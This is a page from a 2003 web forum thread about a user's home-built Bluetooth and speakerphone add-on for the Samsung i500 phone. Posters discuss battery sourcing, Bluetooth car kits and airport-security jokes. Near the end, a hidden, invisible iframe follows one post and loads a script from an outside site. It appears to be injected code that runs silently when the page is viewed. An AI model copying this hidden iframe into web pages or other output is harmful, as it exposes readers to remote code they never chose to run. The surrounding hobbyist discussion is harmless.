+ Reply to Thread
Page 3 of 6 FirstFirst 1 2 3 4 5 6 LastLast

Getting close now...

Okay, there is still some work to go, but here is an update of the now functional modifications:

http://i500.nopdesign.com/hw/index3.html

_Scott

Scott:

You are ****ing AMAZING!!! Did you get my link for extended batteries on Ebay?

rjmoose

Originally posted by rjmoose
    Scott:

You are ****ing AMAZING!!! Did you get my link for extended batteries on Ebay?

rjmoose
    Thanks! I did get your link, and have been staring at cheap knock off batteries for the last 20 minutes. Holy moly, these aftermarket companies are FAST! I'm rethinking the case right now! It might be worth another couple attempts at getting it in the case with a slim battery if they only cost $10 or less a pop! At $70 it's different.

I'm down to the very short strokes now. Here's what I think I have left:

1. Get a new DPDT switch, or even better find a 3PDT switch-- all really really small.

2. Create a better mount for the sled. I think I will permanently mount it to a slim battery for my use.

3. Add the speaker for the speakerphone.. All the hardware is there, it just needs the dang speaker.

4. Make the ribbon cable removeable, so I don't have to have the BT sled on there all the time (although it really isn't that big).

And last, avoid burning down my house with those Li-ion batteries!

_Scott

PS - I heard those batteries make one hell of a show if thrown into a fire!

I am really excited about the speakerphone mod. This is one thing I REALLY miss on this phone.

Keep up the great work and don't burn down the neighborhood!!!

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Originally posted by rjmoose
    Scott:

Try here:

http://search.ebay.com/ws/search/Sal...0&BasicSearch=

Thanks for the great work!!!!
    ok,

I'm editiing my post here. We need to be smart about this to not drive up the price from an initial rush from this board. I'm going to send an email to this store, asking if they will sell the batt's to me in bulk, to stock in my store.

I don't know if you want to buy them direct if i can set up a deal scott, or, if you want an investor like me to pick them up and we'll try and get a good idea of how many people are serious serious about this, and you can do the first batch of, maybe ? 10 or 15? and then judge demand from there?

Scott, do you think its best to go with standards or extendeds?
    Last edited by PHO; 08-08-2003 at 06:16 AM.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

So picture this now; terrorist takes his i500 (or any other phone) on a flight, goes into the toilet, and takes a screwdriver to the battery. Fried plane!

Wow, these batteries seem to be quite volitale. Do you think they are maybe a bit dangerous?

Scott,

I can see how integration inside the battery case would be nice, but perhaps a slim slice that sticks on the slim battery back would be easier to do?

hah!

I will have to pass since I do not understand more than half of what has been discussed in this forum. I am a monkey!

I dont even know the advantages of BT and why its so impoprtant...how it needs or works with Jabraw. All I would love is a speakerphone...I do not care for the headset as I WILL NOT wera one of those in my head (reason why I would love a speaker).

Anyway, let some of us know if our phones can be upgraded to have a speaker with no headset. Can you help us do it or do it(for those of us that will continue with donations to cover the costs).

ebay auctions for you

http://cgi.ebay.com/ws/eBayISAPI.dll...category=20374

these three are for the 1400MaH batteries. There is a slimmer version too. Also if you do a search for "Samsung I500" you'll get a couple batteries that show a different phone. Those are have the word "longlife" in their title and show a different looking battery. The above show the back of the actual battery. They are rated at only 3.6v instead 3.7v, but I've used lesser voltage in products before and it hasn't made a difference. I can't imagine it'd make a difference here either, but you're not using these batteries anyway, just the case. Also because it's not the polymer, I don't think you'll have that exploding problem anymore either.

I'm glad I was on track with what you're doing. You could seriously sell a lot of those modified batteries if people didn't have to mod the phone itself. That headphone jack though seems like a tough one to overcome. Good luck and look forward to seeing the end result.

Re: hah!

in easy terms...a bluetooth enabled phone allows it to communicate wirelessly with other bluetooth enabled products. so instead of having a corded headphone, you can have a bluetooth headphone that will communicate wirelessly to your phone so no headphone jack and cord dangling from your ear to the phone. if you have a BT enabled computer you could hot sync wirelessly or use the phone as a wireless modem. Or imagine if you had a bt enabled stereo (that'd be interesting) you could pop in your sd card (if that mod is made) and just have your phone in the vicinity and play your MP3's through your stereo.

Originally posted by Luis
    I will have to pass since I do not understand more than half of what has been discussed in this forum. I am a monkey!

I dont even know the advantages of BT and why its so impoprtant...how it needs or works with Jabraw. All I would love is a speakerphone...I do not care for the headset as I WILL NOT wera one of those in my head (reason why I would love a speaker).

Anyway, let some of us know if our phones can be upgraded to have a speaker with no headset. Can you help us do it or do it(for those of us that will continue with donations to cover the costs).

I believe the slim battery would be drained rather quickly if it was also powering the mods as well as the phone. I think they're saying the standard battery is pretty much the minimum.

Originally posted by abward
    I can see how integration inside the battery case would be nice, but perhaps a slim slice that sticks on the slim battery back would be easier to do?

Scott, you are unbelievable. Do you ever sleep? That sled is amazing. I can't wait for the BT mod. Keep up the great work.

PHO

Re: hah!

Originally posted by Luis

Connecting to devices - wireless headset (mentioned above) computer, printer, OTHER HANDHELDS like use a pocket pc to Surf the net with better browser support and larger screen. (have to check with the advantage agreemnt, says you can't do it with a laptop and says if ou have a Pocket PC phone you need to pay more, not sure it doesn't say you can use your Regular phone with a pocket PC

I am interested in the

1 Bluetooth Headset
    2 Bluetooth Car kit (Imagine, step into your car and your car kit just comes on and you continue wiht the conversation with the phone in your pocket)
    3 Bluetooth Keyboard, There is one supposedly "out" now, but i emailed them and they haven't responeded there are 2 or 3 more slated to be out by the end of the year, early 2004.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

Re: Re: hah!

now that would be sweet

Originally posted by PHO

2 Bluetooth Car kit (Imagine, step into your car and your car kit just comes on and you continue wiht the conversation with the phone in your pocket)

PHO

Re: Re: Re: hah!

Originally posted by crogs571
    now that would be sweet
    there are already a few availble on the market.

Sony HCB-30 Bluetooth Car Kit
    review
    http://mobile.burn.com/review.jsp?Id=321

Motorola(but i think this is only compatable with motorola phones
    http://commerce.motorola.com/consume.../btcarkit.html

Nokia Bluetooth car kit CARK-112

and

Parrot DriveBlue Installation-free Bluetooth Car Kit
    review of parrot
    http://mobile.burn.com/review.jsp?Id=369
    Last edited by PHO; 08-08-2003 at 08:48 AM.

www.grtalk.com

Rumor has it that the 2004 Acura TL will have a Bluetooth car kit as a factory option, or even as standard equipment.

quick question and observation:

an earlier poster commented on getting on a plane with the phone and battery volitility...

but, what about trying to get onto a plan with this sled design?? right now the pictures show wires going in and out of the phone, I realize this is just scott's prototype, but I know airport security would have a cow if a cell phone went thru with wires and connectors visiable like this....

question: Scott, I saw an earlier comment by you that if you did this for the masses there would be no internal mods?? I would definitly be interested... I think it would be a plug into the bottom data port and the ear phone jack??

once you get the specs completed for a complete external mod, could you post a new thread with these specs, how it would all work, and price?

thanks and keep up the astonishing work!!

editing this post to add a comment: another thread was discussing PTT (push to talk) which is suppose to be rolled out by sprint in OCt... but this I500 isn't compatible... anyway to add this technology to the sled device when it is available?? maybe leave some room for that?? just a thought??
    old devices: I300, I330, I500
    current: I730

PHO
    Originally posted by clintrob
    quick question and observation:

an earlier poster commented on getting on a plane with the phone and battery volitility...

but, what about trying to get onto a plan with this sled design?? right now the pictures show wires going in and out of the phone, I realize this is just scott's prototype, but I know airport security would have a cow if a cell phone went thru with wires and connectors visiable like this....

question: Scott, I saw an earlier comment by you that if you did this for the masses there would be no internal mods?? I would definitly be interested... I think it would be a plug into the bottom data port and the ear phone jack??

once you get the specs completed for a complete external mod, could you post a new thread with these specs, how it would all work, and price?

thanks and keep up the astonishing work!!

editing this post to add a comment: another thread was discussing PTT (push to talk) which is suppose to be rolled out by sprint in OCt... but this I500 isn't compatible... anyway to add this technology to the sled device when it is available?? maybe leave some room for that?? just a thought??
    Clint - Scott has posted that his mod would be external and clip on and no internal changes would be nessecary, just a patch cord to the earpiece part and a cord to the charger area. You can take it off and be fine with airport security.

On a side note, i spoke with a distributor of the batteries, we can get them CHEAP. i'll pass the info onto Scott, and see what he wants to do iwth it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

www.grtalk.com

Airport security: What is that wire coming out of your phone
    Scott: It's my home-made add-on to allow a speakerphone and bluetooth
    Airport security: Please open up the case so we can verify there's no bomb inside
    Scott: Well actuall, there's flammable material inside that's very sensitive -- I can't open it up or there will be a fire
    Airport security: You are under arrest for attempting to smuggle a firebomb aboard a plane!

Originally posted by Iceman
    Airport security: What is that wire coming out of your phone
    Scott: It's my home-made add-on to allow a speakerphone and bluetooth
    Airport security: Please open up the case so we can verify there's no bomb inside
    Scott: Well actuall, there's flammable material inside that's very sensitive -- I can't open it up or there will be a fire
    Airport security: You are under arrest for attempting to smuggle a firebomb aboard a plane!

hahaha... me and a colleague had this conversation earlier... I was showing him Scott's pics and we were wondering what would happen if he tried to get on a plane with it.... I think you summed it up very well.... haha... here's another one

airport security: what is bluetooth???
    old devices: I300, I330, I500
    current: I730

WOW, so what's next external caller ID? LOL!!!